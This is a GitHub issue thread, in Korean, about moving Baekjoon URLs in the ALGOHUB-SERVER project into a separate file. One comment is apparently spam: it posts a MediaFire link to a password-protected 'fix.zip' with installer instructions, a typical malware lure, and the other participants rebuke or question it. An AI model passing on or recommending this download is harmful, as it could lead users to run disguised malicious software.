### ISSUE TITLE
refactor : URL 파일 분리

### ISSUE THREAD

**Issue by rladmstn** [GAMZA-BAT/ALGOHUB-SERVER#79]
## 📌 Issue

문제 등록 API와 백준 닉네임 유효성 검사 API에서 사용되는 백준 URL을 파일에 따로 분리합니다.

## ✅ TODO

- [x] URL 파일 분리

**Comment by CosionMa** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by rladmstn** [comment]
> Download https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file password: changeme In the installer menu, select "gcc."

건실하게 살어라

**Comment by s-hwan** [comment]
> > Download https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file password: changeme In the installer menu, select "gcc."
> 
> 건실하게 살어라

?????????ㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋ
이거 뭐야?
